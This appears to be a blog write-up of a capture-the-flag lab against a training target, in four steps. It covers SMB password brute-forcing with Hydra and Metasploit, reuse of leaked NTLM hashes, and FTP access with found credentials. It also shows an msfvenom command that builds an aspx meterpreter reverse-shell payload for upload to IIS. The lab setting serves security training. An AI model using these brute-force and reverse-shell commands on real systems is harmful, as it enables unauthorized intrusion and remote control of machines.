AboutLinkedInGitHubMediumBlog

CTF 2 - Exploitation

Question 1

Looks like smb user tom has not changed his password from a very long time

Firstly, let's run an Nmap service version detection and script scan specifically targeting port 445 as we know SMB runs on that port. Since we know that tom has a weak password, we can perform a brute-force attack using Hydra.

hydra -l tom -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt target.ine.local smb

Alternatively, we can use the Metasploit module (smb_login) to perform the brute-force which will also give us an SMB session. Now, let's list out the shares - which again you can use the session within Metasploit or smbmap. I'm going to use smbmap in this case to list out the shares:

smbmap -H target.ine.local -u tom -p felipe

Now that we can see that there are only 3 shares that we can access, let's connect to those shares. In this case, I'm going to switch to my Metasploit session and do so but you can also use smbclient to connect. After connecting to the shares, list out the contents to find the flag.

Question 2

Using the NTLM hash list discovered in the previous challenge, can you compromise the user nancy?

From the previous task, we logged into the share HRDocuments to find the flag in which there was also a file called leakedhashes.txt. Download that file to then use as the PASS_FILE password list within the Metasploit module smb_login. Also set the SMBUser to nancy and run the brute-force. Now since we have a session, we can view the shares and try to access each one until we are allowed access. Lastly, list out the contents to find the flag.

Question 3

I wonder what the hint found in the previous challenge will be useful for!

From the previous question, make sure to also cat out the contents or download the hints.txt file. Since we have been given credentials for something, let's look at the other open services on the system by running another Nmap scan. We can see the port 21 is open with FTP running so let's try to connect to it using those credentials. Once connected, list out the contents to find the last flag.

Question 4

Can you compromise the target machine and retrieve the C://flag4.txt file?

From our Nmap scan, we can see that port 80 is also open running Microsoft IIS. Since we have access to FTP, let's upload a malicious asp or aspx payload to the server to gain a shell. We can utilize msfvenom to create a payload or we can use one of the pre-configured web shells located locally on the Kali Linux system. In this case, I will be using msfvenom as we can create a meterpreter payload.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f aspx > shell.aspx

We can now upload the aspx payload to the server via FTP using the put command. Now we need to set up our multi handler within Metasploit. Once that is done, head to the aspx file within the browser (http://target.ine.local/shell.aspx). Now that we have our meterpreter session, navigate to the root of the C:// drive and list out the contents to find the last flag.

PreviousCTF 1 - ExploitationNextCTF 3 - Exploitation

Last updated